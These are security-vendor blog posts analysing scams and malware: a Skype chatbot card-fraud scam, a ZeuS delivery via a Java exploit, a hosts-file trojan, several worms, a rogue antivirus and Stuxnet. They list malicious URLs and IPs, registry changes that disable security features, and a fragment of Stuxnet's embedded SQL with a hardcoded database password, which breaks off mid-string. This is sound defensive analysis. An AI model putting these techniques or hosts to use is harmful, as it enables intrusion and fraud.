Have you ever received a contact request on Skype from someone you don’t know? This may happen from time to time, particularly if your Skype name is publically searchable. But what is really behind these contact requests and why do people bother? To find that out we played along and the following conversation ensued:

At first sight it appears to be someone looking for companion. But the dialogue is suspiciously general, questions are never really answered and the responses don’t allow for a meaningful discussion of any kind. When asking “Are you a bot” the invariable answer is “lol no i’m not a bot silly.”

The contact in our example has listed their birthdate as 1980, but claims to be 25 years old. That doesn’t add up either and when we ask about it, the question is completely ignored.

All this makes it obvious that instead of chatting with a real person we are in fact dealing with a chat bot. And this begs the question, why would a chat bot be interested in a human companion? Surely not for an engaging conversation… The answer to that question becomes clear when we look at the link the helpful Eva sent us when she offered her “free passes”. We are asked to sign up to what appears to be an X-rated video chat site:

It looks like our Eva is in fact Nancy, but who cares about such minor details when it appears we have a free date? Lets move on to the registration:

This looks like a standard registration form, so lets complete it and click Continue:

Now wait a second, our credit card information is required and that’s not what we had agreed to. Why would we need to provide payment details if “today’s charge is $0.00″ anyway? There goes our free date and at the same time this reveals the true aim of this scam: credit card fraud.

“Safe Secure Encrypted” sounds good, but unfortunately we are not convinced of the accuracy of this statement. The site doesn’t even use the HTTP secure protocol (which would give the URL the “https://…” prefix), so our dating adventure ends here.

Its all about the money

While chat bots may have a legitimate purpose (such as leaving an automated message when you are offline), that isn’t the case here. The only purpose of chat bots like the one we encountered, is to trick people into signing up and submitting their credit card details insecurely. Whoever gains access to the requested information (name, card number, CVC/CVV code and so on) can use your credit card on the internet for whatever they want. That’s a chilling thought, as scammers won’t waste any time in getting their hands on your money.

If you have become the victim of a (suspected) credit card scam, it is recommended that you contact your credit card provider (bank or financial institution) as soon as possible. They can block your card immediately and will tell you what steps you need to undertake to regain access to it.

Java is installed on almost all computers. This is an obvious security risk, considering that there are regular announcements on new Java vulnerabilities that enable hackers to infect your PC with malware. However, most users don’t even need Java and can safely uninstall it without losing needed functionality. Keep reading to learn all you need to know about Java and avoid unnecessary security risks to your PC!

Java and JavaScript – there is a huge difference

Both words sound closely related, but they actually aren’t. Whereas Java is a complete programming language or run-time environment for programs, JavaScript is, as you may deduce from the name, a scripting language. Scripting languages are mostly used to run rather small tasks, especially within your browser. JavaScript as a part of a website generally doesn’t have access to your computer’s filesystem and can’t run any programs or create files. Java, on the other hand, can. Running Java applications is basically like starting a regular program on your PC, which of course includes
the ability to modify files on the system.

On one hand, Java programs can be run locally on your PC, and on the other hand, as a so-called Java applet in a browser that supports Java. Java applets are embedded in a webpage by means of simple HTML code:

When accessing the webpage with this HTML code, the Java applet called “javaprogram” is downloaded from the web server to your computer where it is run. Java applets are usually used when a website requires access to local files or your computer’s hardware.

Why is Java so dangerous anddo I really need it?

Depending on which browser you are using and your settings, there may be security restrictions placed on Java, but these are frequently bypassed by vulnerabilities (“exploits”) within the Java environment or your browser itself. By default, Java applets are forbidden from interacting with other programs outside of the browser and from accessing files on your computer. However, if these restrictions are bypassed by an exploit, your system is wide open to anyone.

WARNING!
THE CURRENT JAVA VERSION IS CONSIDERED VULNERABLE!

Although Oracle, the company behind Java, has published several security updates in recent weeks, new vulnerabilities have already been discovered in the current version that enable specially crafted websites to gain full access to your system. As security updates are usually released with a delay of several months, this means that at any time, the current Java version may be vulnerable. All recently discovered vulnerabilities have one thing in common: They are exclusively related to browser Java applets, not locally installed Java programs.

Do Bilet, Benfry or ThinkFree ring a bell? Probably not, and this comes as no surprise – there are hardly any frequently used Java applets. Java applets are primarily used in business environments and company intranets. As a private user, you are more likely to encounter websites that use JavaScript or Flash. Things are a little different for desktop applications. There are quite a few well-known programs that require Java.

How to use Java securely

Here is Emsisoft’s security advice concerning Java:

	If you don’t need Java at all: Uninstall it! As with any other software, you can do this from the Control Panel via “Programs and Features”.
	If you are using Java programs, but don’t need browser integration, disable it. Information on how to achieve this can be found on the Java Homepage.
	If you do require Java, be sure to keep it up-to-date at all times. Don’t hesitate to apply new updates when they become available, as they may fix critical vulnerabilities.
	As critical vulnerabilities are usually not discovered before there is a new infection wave, it is important to use security software with real-time protection. Emsisoft Anti-Malware is able to reliably detect attacks even by unknown malware, thanks to its three security layers.

“Your computer is blocked!” – Not something you enjoy seeing when using it. Unfortunately thousands of PC users worldwide find themselves in a situation where, all of a sudden their computer is unusable unless they pay a fee to unlock it. The FBI or a similar national law enforcement organization seems to claim that access to the computer has been restricted. The usage of pirated software, distribution of child porn and copyright infringements are most often brought up as grounds for these restrictions. “Seems” is the keyword here, because a malware infection, not an official law enforcement organization, is responsible.

While the idea of scaring a user into paying money to regain the use of their computer isn’t new and has been used for years by rogue security programs, the “scare” factor is much greater with so-called ransomware because in many cases the PC cannot be used at all, with the only active option remaining, being the entry of the unlock/payment code.

The last months have shown a massive increase in ransomware infections with new variants, droppers and infection methods each day. We have previously discussed ransomware in 2011 – The Renaissance of Ransomware, but because the risk of catching such an infection has increased so much we want to afford it extra attention to make computer users aware and point out preventive measures.

There are two main categories of ransomware, the so-called screenlockers and crypto ransomware. Screenlockers are wide-spread; they use exploit kits, infected sites and downloads and target home users as well as corporate computer users. Crypto ransomware often (but not exclusively) spreads through dedicated server hacks and home users will not be affected as much by this category of ransomware.

Screenlockers

Screenlocker ransomware can infect a computer in a variety of ways. Popular methods include the use of Java exploits as many Windows users have outdated versions of Java installed, which contain certain vulnerabilities that can be exploited by malware to infect a system. And of course porn sites with videos or other site content that when executed/activated actually installs malware.

A typical screenlocker will usually display a law-enforcement logo. Which logo that is depends on the screenlocker variant, but can also depend on country. Furthermore an offense is specified; as mentioned already, this often concerns copyright infringement, child porn distribution, software pirating and similar. Next of course is the most important thing – the payment method. Sometimes a specific unlock code is required, but in most cases a prepaid payment method like Ukash or PaySafe is used.

Some screenlockers add extra elements, for example to give the impression that webcam capture is activated or geographical data is being collected, by displaying the IP address and location (see image).

Windows as well as all third-party software present on your computer is up-to-date. Especially Java and Adobe Reader – two programs that are commonly exploited by malware for the simple reason that they are installed on so many systems and many users use older versions. For further advice on how to keep your computer safe, also see this article.

In particular, the number and variety of screenlocker infections have exploded in 2012. One of the most common screenlockers is Reveton (see image), commonly referred to as the FBI moneypak trojan. While during the first months of 2012 this infection was seen only occasionally, there was a major outbreak in July/August and since then other variants have also been increasing in prevalence, causing screenlocker infections to surpass the amount of rogue infections.

While the ransom screen can look convincing, it is nothing more than a scam, with the only objective being to scare a computer user into paying the ransom. Fortunately, removal of a screenlocker is possible and our experts on the Emsisoft Support forum are always there to help victims of such scams to regain access to their computer.

Crypto ransomware

Well-known crypto ransomware infections are ACCDFISA and Dorifel. Unlike screenlockers, crypto malware actually encrypts personal files (on all drives connected to the computer at the moment of infection), which makes it a much more severe threat than screenlockers. Newer crypto malware variants make recovery of encrypted files extremely difficult if not impossible. A preventive security solution is imperative as important personal files could be irretrievably lost, which, especially in a corporate environment can cause serious problems. A few preventive measures, necessary for any server are:

• Make sure all the latest server/software updates and patches are installed. Server hacks are often performed by exploiting an existing software vulnerability. Whenever a zero-day vulnerability is discovered a software company will release a patch to fix this and it is crucial to apply such patches as soon as possible.
• Make sure offline backups (backups stored on a medium not connected to the server computer) are made regularly, because data on any connected backup drive will be affected, making the backup useless.
• Use strong passwords, containing random characters. This will make gaining server access through brute-forcing a lot more complicated.

Other crypto ransomware like Birele infects home users as well as corporate users, using the same methods as screenlocker ransomware. In some cases recovery of the encrypted data is possible.

So, how much money is involved?

A typical screenlocker usually asks for $100 – $200, crypto ransomware may ask a lot more (it is not uncommon for newer ACCDFISA variants to request sums of $4000).

The reason for this difference can be explained by looking at the targeted victims (loss of critical files on a server used to store company/customer data can mean a direct financial loss for the company). Millions are made yearly by people who set up these scams. The images show a few ransom amounts from different variants. As ransomware is so “popular” and recovery can be difficult, prevention is essential, not only for corporate users but for home-users as well. To summarize, we recommended that all users heed the following advice to save themselves a lot of trouble and frustration:

• Make sure all software is up to date and especially when using servers running 24/7, ensure you are using strong passwords.
• Use a real-time Antivirus solution with a good behavior blocker such as Emsisoft Anti-Malware, which will detect the changes ransomware makes at an early stage.

Last week, a new zero-day Java vulnerability created quite a buzz on the Internet. To illustrate just how effectively this vulnerability is exploited, lets have a look at an email our research lab received, supposedly from LinkedIn.

Below you can see the email as we received it. It looks harmless enough and appears to be sent to us from a genuine LinkedIn email address.

The message looks pretty authentic, but as it happens “Carlos Green” doesn’t sound familiar. A simple right click and copy of the hyperlink reveals the actual URL address:

hxxp://cdn-iix.static.unkn0wn.or.id/linkfrrequest.html

Which in turn redirects us to:

hxxp://shininghill.net/detects/solved-surely-considerable.php

Analysis of this URL reveals that it exploits a vulnerable Java version (7 update 10 or older) in order to install the well-known ZeuS banking trojan. The image below illustrates how an executable with a size of 285184 bytes, named “readme.exe” is retrieved from the remote server. A quick check of the binary data reveals that this is the same file as the ZeuS executable that will end up infecting the system.

After the malicious code is loaded the browser will redirect to the normal LinkedIn website. The installed malware is detected by Emsisoft products as Trojan.Win32.Zbot.

When testing the malicious URL on the same system with the latest Java update (7 update 11) installed, the site will still make an attempt to infect the computer but will not succeed in requesting and retrieving the readme.exe file. In the end no malware is installed.

More information about this Java vulnerability can be found in the Oracle Security Alert for CVE-2013-0442.

Java exploits are among the most common sources of infection. Many computer users have Java installed but do not keep it up to date. This makes it a profitable business for malware-writers and-distributors to look for (new) vulnerabilities and exploit them.  New exploit kits are sold for thousands of dollars.

If you have become the victim of this exploit and need help cleaning your computer, our experts in the “Help, my PC is infected!” Emsisoft Forum are always ready and willing to offer additional help. The removal service is free even if you are not an Emsisoft customer yet.

To prevent infection in the first place, make sure you:

• Keep Java and other commonly exploited software (e.g. Adobe Reader and Flash player), as well as your Windows installation up to date.
• Use an Antivirus solution with a good behavior blocker, such as Emsisoft Anti-Malware. Traditional signature-based detection alone is ineffective against this type of malware. 

“Cloud” is definitely one of the IT sector’s most popular marketing words of recent years. The virtual clouds promise you easy and mobile access to data and services. The anti-virus sector has also come to use this technology. Fast scans and very low resource usage are clear advantages of cloud-based scanners. But, as usual, there are two sides of the coin. 

What is a cloud?

Cloud-computing is, put simply, the distributed delivery of IT infrastructure over a network. This can be basically anything. Storage services in particular are currently in vogue, where a computing center often offers storage over the web. You can use this storage on your PC at home just like a conventional local hard drive even though it is really located hundreds or even thousands of miles away. As you, the user, never know exactly which server your data is on, we speak of a data cloud where everything is stored.

Complete programs and services are also offered via cloud. Just like conventional client/server architecture, spreadsheet software for example is run on an external computer, which is a server. You are provided with an interface on your own PC via the Internet, which allows you to use the software. This is very convenient as it requires no software to be installed, and computationally intensive operations are also outsourced.

Conventional anti-virus solutions have a problem

Conventional virus scanners are still based on signatures. Yet sooner or later they will be stuck between a rock and a hard place as the number of newly discovered malware variants doubles every 12 to 18 months. This then multiplies the number of signatures to be loaded exponentially. Virus scanners detect malware using these signatures, which are essentially digital fingerprints (see our article Signature recognition or behavioral analysis – Which is better?).

This means that scanner-based security software uses more and more storage space every year and affects users who have a bad Internet connection in particular, as they have to load the signatures either directly during installation or during the first online update. Some providers require several hundred megabytes – a nightmare for users who do not yet have a broadband Internet connection. They also use a lot of RAM as the signatures need to be in the RAM for quick scans. High memory usage has a negative effect on the performance of older PCs in particular and makes these programs lose valuable points in comparative tests. Yet a greater memory usage usually also means more signatures and therefore better detection rates in general.

What are the advantages of cloud anti-virus technology?

Security solutions in the virtual cloud solve almost every problem that conventional, locally installed malware mashers have. The user only has to download pure scanner technology, which is only a few megabytes or even kilobytes from most providers. All signatures are located on a centralized scan server and can be updated at any time, without any delay and in any number desired.

In a way, the cloud scanner does the opposite of conventional signature scanners by creating signatures from the files found on the PC and submitting them to the scan server for analysis. If there is a hit, it will alert you of an infection as usual. You cannot see that this whole procedure is handled externally. You only see the result and that the scan is running way faster and using much fewer resources. The cloud scanner also detects deviations from normal system status by combining the data of a vast user community very quickly, which is another advantage. This makes it possible for the system to be viewed as a whole and to detect new unknown malware variants.

So what’s the catch?

It just sounds too good to be true. Faster, better, using fewer resources – if this were all true, there would be no more conventional virus scanners. The devil is in the details for cloud anti-virus software: A regular PC hosts 300,000 to 500,000 files on average. If all these were scanned, uploading the signatures created on the fly to the scan server would take forever.

This is exactly why cloud anti-virus software filters the files to be scanned in the first place according to different rules and parameters. For instance, there are some file types or paths that are generally considered safe. Many cloud anti-virus solutions therefore come with huge whitelists. These are sort of inverse signatures that classify known programs as safe. This massively reduces the number of files to be scanned – even though more data needs to be downloaded to your PC.

This incomplete scan is, however, the Achilles heel of this technology. If not all of the files are properly scanned there are always gaps that malware can use, whether these are as yet unused paths or a file type that has been considered safe until now.

Another problem is that files that the scan cloud has not yet detected at all are, in most cases, entirely submitted to the cloud for further analysis. If you were happy about the small download, you’ll get a nasty surprise when scanning for the first time: countless megabytes are uploaded to the cloud. And many will not even be aware of the fact that private or important company data ends up on third-party servers.

Hybrid technology as the best solution

We believe that combining a cloud service with a conventional anti-virus scanner offers the best of both technologies. This is why many Emsisoft products use cloud features.

First of all, Emsisoft Anti-Malware offers the possibility of participating in the “Emsisoft Anti-Malware Network”. If you enable this option, all decisions regarding alerts from the behavior blocker are directly submitted to our server. This enables other users to see if the majority of the community allows or blocks a program and thus helps you to make a decision. There is also a “trust index” for every program based on statistical calculations. Programs that are definitely safe are put on a whitelist, and there will be no further alerts for this program.

Emsisoft Anti-Malware’s scanner also asks if you would like to submit suspicious patterns in newly discovered files (only program files, no documents). Our analysis team then analyzes the suspicious file thoroughly and creates a new signature if need be. This helps Emsisoft and also all users by reducing the response time in the event of new malware outbreaks and offering the best protection possible.

Our HIPS-based firewall Emsisoft Online Armor also uses the Emsisoft Anti-Malware Network. Saved rules for allowed and blocked programs are submitted to the Emsisoft cloud in order to reduce future alerts. False alerts are avoided in an efficient manner without lowering the security level.

Incidentally, all data on program files stored in the Emsisoft Anti-Malware Network is visible to everyone and even searchable. The Emsisoft cloud is thus not closed, but absolutely transparent and can be accessed through a website as an interface at any time. There are currently more than 12 million known program files (as of November 2012), including geographical distribution of malware occurrence. See for yourself: IsThisFileSafe.com.

Social Networking has really taken off in the last couple of years, and websites related to the same are experiencing big time hits all around the world. Facebook, Twitter, Orkut, and then there is Vkontakte (Vk.com for English speaking users), each having millions of users registered and thus huge targets for malware authors. The more the merrier they say.

We got reports of an increasingly prevalent malware spreading via Vkontakte, and carried out a deep analysis.

As seen from the above images, possibly from compromised accounts, malicious links propagates to other users even though Vkontakte seems to be aware of the malware and warns in every possible way. The malware have been spreading named as Podarok.exe and a simple search shows how widespread it is. Sure has been around for sometime but the mechanism of infection and consequence have been changing rapidly. The malware itself is actually a batch file, which gets converted to an Executable using BatToExe Converter from http://www.f2ko.de/English/b2e/index.php. The converter stores the batch file named “troy_mcclur.bat” in the resource section of the executable, and packs it with UPX. The batch file gets extracted from resource and executed on run-time.

The usual trick of disguising itself with a trusted icon continues, here the malware using modified Vkontakte.com’s favicon.

Once executed, the malware opens Notepad.exe, while in the background modifies the hosts file redirecting following addresses to a specific IP: 85.234.190.32.

• odnoklassniki.ua
• vkontakte.ru
• www.durov.ru
• www.odnoklassniki.ru
• wap.vkontakte.ru
• vk.com
• www.durov.vkontakte.ru
• www.wap.vkontakte.ru
• www.vkontakte.ru
• www.pda.vkontakte.ru
• durov.vkontakte.ru
• odnoklassniki.ru
• pda.vkontakte.ru
• www.mail.ru
• www.vk.com
• mail.ru
• www.odnoklassniki.ua
• durov.ru

The Trojan also goes on to create another file named h(random character possibly)sts”, and hides the original hosts file.

We attempted to navigate to the above mentioned IP, and were presented the following message.

Simple Google translation gives a basic idea,

but our Ukraine based researcher helped us in translation of the whole thing.

Блокировка Веб-Aнтивирусом

Blocked by Web-Antivirus

Or

Blocked by Web-Filter

Запрашиваемый URL-адрес не может быть предоставлен

The URL you are trying to reach cannot be served.

Причина: вредоносная ссылка

Reason: malicious link

Если Вы считаете, что Веб-страница заблокирована ошибочно, отошлите SMS сообщение с текстом

If you think that this web-page was blocked in error, please send sms with the following text:

64261823 на номер 1350 (Россия)

64261823 to 1350 (Russia)

64261823 на номер 7139 (Украина)

64261823 to 7139 (Ukraine)

64261823 на номер 3336 (Белоруссия)

64261823 to 3336 (Belarus)

Сообщение создано:

Антивирус Касперского 2010

Message created:

Kaspersky Antivirus 2010

Well, initial reaction seeing the message would be a malicious website is blocked by Kaspersky Antivirus 2010, and then comes the new age of social networkingengineering. Analyzing the incident, and few different other similar since last year, when the user tries to access his profile at Vk.com the fake Kaspersky warning appears saying ACCESS DENIED, and website is blocked. To solve the issue, user must send a SMS with the text

• 64261823 to number 1350 (Russia)
• 64261823 to number 7139 (Ukraine)
• 64261823 to number 3336 (Belarus)

Thus, any unaware user goes on to send the premium SMS to the specified number and the malware author/developer gets his share from the money generated by those.

There have been malware blocking users out of Windows system, activation screens and even files in the system. The mechanism we wrote about today is very simple with modification of hosts file, but the effect is cutting down the access to a user’s favorite and trusted space in the web. Playing down the Trust factor and related exploitation takes another dimension. The source of revenue evolves with minimal user interaction and effects on the system.

Emsisoft Anti-Malware protects the users by detecting this malware as Trojan.Win32.Qhost!IK, and we will remove the infected hosts file from the system. We do recommend users to navigate the following address http://support.microsoft.com/kb/972034#LetMeFixItMyselfAlways for further instructions to restore the original Hosts file. Be safe, and remain updated.

In the security and malware research space, every now and then there comes something which suddenly becomes widespread and raises eyebrows all around. The latest “Here You have” related worm is one such incident and we thought to share with end-users our findings and also make them aware of its capabilities and technicalities. Emsisoft Anti-Malware detects the malicious binaries related as Email-Worm.Win32.VBMania!A2 or Trojan.Win32.Swisyn!IK.

The image above is a sample email with a subject of “Here you have” and if we look closely, the email doesn’t contain any file attachment but only a hyperlink. If the hyperlink is clicked, it will download a malicious file. Once the file is executed, it will connect to the following address

• http://members.multimania.co.uk/yahoophoto/tryme.iq
• http://members.multimania.co.uk/yahoophoto/ff.iq
• http://members.multimania.co.uk/yahoophoto/gc.iq
• http://members.multimania.co.uk/yahoophoto/ie.iq
• http://members.multimania.co.uk/yahoophoto/im.iq
• http://members.multimania.co.uk/yahoophoto/m.iq
• http://members.multimania.co.uk/yahoophoto/op.iq
• http://members.multimania.co.uk/yahoophoto/pspv.iq
• http://members.multimania.co.uk/yahoophoto/rd.iq
• http://members.multimania.co.uk/yahoophoto/w.iq
• http://members.multimania.co.uk/yahoophoto/SendEmail.iq
• http://members.multimania.co.uk/yahoophoto/hst.iq
• http://members.multimania.co.uk/yahoophoto/re.iq
• http://members.multimania.co.uk/yahoophoto/tryme.iq

In this specific case making the victim’s system infested with spams. It will read the address book of Microsoft Outlook and also Yahoo! Messenger, and goes on to send malicious emails to the contacts listed.

The forwarded email reaches the inbox of the recipients with a malicious hyperlink, as can be seen from the above image – hxxp://members.multimania.co.uk/yahoophoto/PDF_Document21_025542010_pdf.scr. The link when clicked will download .SCR file though with a PDF icon to confuse end-users.The worm is created using Visual Basic, and an approximate size of about 284KB.

The worm drops following files in the mentioned location

• %WinDir%\autorun2.inf
• %WinDir%\autorun.inf
• %WinDir%\tryme1.exe
• %WinDir%\vb.vbs
• %WinDir%\re.exe
• %WinDir%\re.iq
• %WinDir%\hst.iq
• %WinDir%\rd.exe
• %WinDir%\pspv.exe
• %WinDir%\op.exe
• %WinDir%\im.exe
• %WinDir%\ie.exe
• %WinDir%\gc.exe
• %WinDir%\ff.exe
• %WinDir%\%UserName% CV 2010.exe
• %WinDir%\csrss.exe
• %WinDir%\system\%UserName% CV 2010.exe
• %WinDir%\system\updates.exe
• %WinDir%\system32\SendEmail.dll

The file then copies into every root drive, including Removable Disk having capability to spread via removable disk/flashdrives.

• %SystemDrive%\autorun.inf [hidden]
• %SystemDrive%\open.exe [hidden]
• %SystemDrive%\%UserName% CV 2010.exe

The worm goes on to delete following registry keys, related to Windows Security Center Services and Windows Automatic Updates

• HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_WSCSVC
• HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_WUAUSERV
• HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\wscsvc
• HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\wuauserv
• HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_WSCSVC
• HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_WUAUSERV
• HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wscsvc
• HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wuauserv

Modifies Windows and Outlook security settings

• HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\12.0\Outlook\Security\ObjectModelGuard: 0×00000002
• HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\EnableLUA: 0×00000000
• HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\PromptOnSecureDesktop: 0×00000000
• HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\EnableVirtualization: 0×00000000

And modifies Windows logon “shell” value to automatically run when Windows starts

• HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell: “Explorer.exe C:\WINDOWS\csrss.exe”

The worm also enumerates computers on current network and then copies itself

We observed another trick this malware is carrying out. The worm creates many entries on subkey “Image File Execution Options”, which contain a lot of executable names from many known applications including antiviruses, and sets the Debugger value to worm file. Thus, whenever those specific applications are executed, the worm also will also get executed.

It’s a tricky world out there and we all should keep using our common sense before committing to any clicks or tricks. Keep your security products updated and be safe. We at Emsisoft are as always vigilant and will always be steps ahead from these malware authors.

There is a new rogue variant making rounds going by the name Antivirus2010. The malware copies itself to the System32 directory with a name similar to commonly used Windows file present in same directory.

If looked through naked eye, there seems to exist two userinit.exe though one has a unique icon and the other doesn’t. We traversed through the System32 directory in command prompt and the non-english character in the malicious userinit.exe came out quite easily.

The malware registers itself as a service to start automatically with Windows.

On execution, the malware extracts and builds PE file on memory with the name lz32.dll, and makes a remote connection to download another dll component.

Remote address connections established are

• 213.174.130.36:8082/ask?t=1&u=5&a=0&m=aa26135f&h=b4e6aeff&s=0&p=0
• 213.174.130.39
• 213.174.130.39:80/update.db
• http://213.174.130.32/verify.js?key=
• http://213.174.130.39/uninstall.js
• https://secure.avsbilling.com/order/get.php?i=antvir&advert=
• https://secure.avsbilling.com/order/activate.php?orderid=

Downloaded malicious DLL is dropped under the System32 directory. The DLL is normally an eight lettered randomly named file, for example mswmqnei.dll or mspnxdcm.dll and is encrypted. The DLL is loaded into the memory to display the main UI of the rogue security product. The UI was created using HTML/Javascript, which as we can see, the malware stores the UI in the resource area of the DLL.

Analysing the HTML file, in the INSTALL.HTML we can notice a url which is currently inactive. Incidentally the IP in the url is the same one that the malware uses to download malicious file.

The front end of the IP if visited presents a website with adult content.

Looking the registry modification we found some more informations about the rogue product and we decided to do some more research.

A simple dns information on hxxp://www.webtopbilling.com revealed

Domain Name: WEBTOPBILLING.COM

Registrant:

N/A

Nick Besmark        (avbill@ua.fm)

P.O. Box 2494

Victoria

Mahe,00000

SC

Tel. +7.9263901779

Creation Date: 04-May-2010

Expiration Date: 04-May-2011

Domain servers in listed order:

ns2.unitedplatform.com

ns1.unitedplatform.com

Not specifically suspicious about an website registered by someone residing in Mahe, Seychelles and which currently gives a 403 Forbidden message. We then looked at unitedplatform.com and the first thing we noticed about it is that we actually land at domaincontext.com which is a domain registrar website.

But we didn’t want to leave unitedplatform.com yet, and we stumbled upon http://www.malwareurl.com/ns_listing.php?ns=ns2.unitedplatform.com. The malware domains listed there shows more than one instance of malicious activity and maybe coincidence again that all are recently created domains. There maybe a distant connection we can assume, which proves again the inter-relationship between various rogue security products and exploits in the web. It is more than a billion dollar industry out there, but we are always more than a step ahead from them.

In between email spams, twitter, facebook let us not forget one of the most prevalent medium a malware can spread around. Messengers have always been a popular medium for malware propagation and we at Emsisoft Labs recently came across worm like behavior attempting to spread through Yahoo! Messenger.

The initial picture is not too unfamiliar to someone using Messenger, with the popup of a random message window “Is this you on pic? Hxxp://hyperlink.

If the victim clicks the hyperlink, the default browser opens and download file prompt appears.  We found out the following few common executable download links

• PI6-JPG-www.facebook.com.exe
• PIC007-JPG-www.facebook.com.exe
• PIC67576-JPG-www.facebook.com.exe
• PIC676-JPG-www.facebook.com.exe
• PIC6781-JPG-www.facebook.com.exe
• IMG0018.exe

Analysing further we see the parent urls as below

• hxxp://75.102.36.231/*****45336-JPG-www.facebook.com.exe
• hxxp://migre.me/*****?=www.facebook.com/photo.php?=
• hxxp://66.49.214.28/~av***/IMG0018.exe
• hxxp://66.49.214.28/~av***/PI6-JPG-www.facebook.com.exe
• hxxp://66.49.214.28/~av***/PIC007-JPG-www.facebook.com.exe
• hxxp://66.49.214.28/~av***/PIC67576-JPG-www.facebook.com.exe
• hxxp://66.49.214.28/~av***/PIC676-JPG-www.facebook.com.exe
• hxxp://66.49.214.28/~av***/PIC6781-JPG-www.facebook.com.exe

On execution of the malicious file, it opens browser to http://browseusers.myspace.com/Browse/Browse.aspx which disguises itself running its own malicious activities in the background.

We did some initial research, and based on some loose strings from the worm we tried to find out the payload. The worm searches Yahoo! Messenger application by searching window class named “YahooBuddyMain”, and then emulates keyboard events to send fake messages to all Yahoo! Messenger contacts.

Incidentally the worm also tries to spread itself through IRC, below being an IRC log traffic event

The malware also monitors the keyboard strokes using GetKeyState and GetAsyncKeyState API, adding a possible keylogger activity.

There have been quite a few security incident related to usb/flash drives and autorun behaviors. Since thee usage and portability of such vectors are advantageous to users, it was just a matter of time to be exploited by malware authors.

A new threat, recently discovered, is getting some attention and we at Emsisoft wanted to make sure users are aware of the same and also know more than just what it is. The threat is detected by Emsisoft Anti-Malware as Stuxnet, and also goes by TmpHider detected by some other vendors.

The malware has a quite few detections already and as reported by VirusBlokAda, the propagation of the malware makes it different than already prevalent drive and autorun based variants.Stuxnet spread through flash drive, does not require user interaction at all unlike other malwares which uses autorun feature from the same drives. The malware uses created .LNK files to carry on its execution. Emsisoft Anti-Malware detects the exploit .LNK file as Exploit.LNK.CVE-2010-2568.

The following files have been seen to be present in an infected flash disk

• ~WTR4132.tmp
• ~WTR4141.tmp
• Copy of Shortcut to .lnk
• Copy of Copy of Shortcut to .lnk
• Copy of Copy of Copy of Shortcut to .lnk
• Copy of Copy of Copy of Copy of Shortcut to .lnk

Once the user opens the flash drive in Windows Explorer, and Explorer displays the icon of the shortcut, the malware automatically run the malicious files, namely the .TMP files. The consecutive incidents happen without any user interaction or intervention.

Let us dig deep into the malicious events and binaries. ~wtr4141.tmp and ~wtr4132.tmp files are actually DLLs which get loaded into the memory. The malware then extracts two .SYS files named mrxcls.sys and mrxnet.sys, which are kernel drivers responsible for hooking and hide the related malicious files. Thus, soon after execution of the malware, the files do not remain visible to naked eye.Also interestingly, if we check the properties of the .SYS files they are “digitally signed” with “Realtek Semiconductor Corp.”.

The kernel drivers get installed without any notification from Windows as Windows thinks the files are trusted based on digital signatures. Verisign as of now has revoked the said certificates and also taken necessary steps to make sure the malware won’t be able to run smoothly with fake certificate.

Microsoft has explained that they are still investifating and working on an update to address this vulnerability (CVE-2010-2568). The report does mention that even completely patched Windows 7 32 bit or 64 bit is affected by this vulnerability. The following is the complete list of affected versions of Windows system.

Stuxnet goes on to inject malicious files into the processes services.exe and svchost.exe. On infected processes one can see the module named KERNEL32.DLL.ASLR.XXXXXX. The malware creates the following in an infected machine.

• %windir%\system32\drivers\mrxcls.sys
• %windir%\system32\drivers\mrxnet.sys
• %windir%\inf\oem6C.PNF
• %windir%\inf\oem7A.PNF
• %windir%\inf\mdmcpq3.PNF
• windir%\inf\mdmeric3.PNF

Analysis done in our lab revealed lots of interesting strings

s7hkimdb.dll

S7EPATDX.CPL

ApiLog\Types

SOFTWARE\Microsoft\MSSQLServer

WinCCConnect

.\WinCC

sqloledb

GracS\cc_tlg7.sav

Step7\Example

use [%s]

declare @t varchar(4000), @e int, @f int if exists (select text from dbo.syscomments where(N'[dbo].[MCPVREADVARPERCON]')) select @t=rtrim(text) from dbo.syscomments c, dbo.sysobjects o where o.id = c.id and c.id = object_id(N'[dbo].[MCPVREADVARPERCON]') set @e=charindex(',openrowset',@t) if @e=0 set @t=right(@t,len(@t)-7) else begin set @f=charindex('sp_msforeachdb',@t) if @f=0 begin set @t=left(@t,@e-1) set @t=right(@t,len(@t)-7)  end else select * from fail_in_order_to_return_false end set @t='alter '+@t+',openrowset(''SQLOLEDB'',''Server=.\WinCC;uid=WinCCConnect;pwd=2WSXcder'',''select 0;set IMPLICIT_TRANSACTIONS off;declare @z nvarchar(999);set @z=''''use [?];declare @t nvarchar(2000);declare @s nvarchar(9);set @s=''''''''--CC-S''''''''+char(80);if left(db_name(),2)=''''''''CC'''''''' select @t=substring(text,charindex(@s,text)+8,charindex(''''''''--*'''''''',text)-charindex(@s,text)-8) from syscomments where text like (''''''''%''''''''+@s+''''''''%'''''''');if @t is not NULL exec(@t)'''';ex

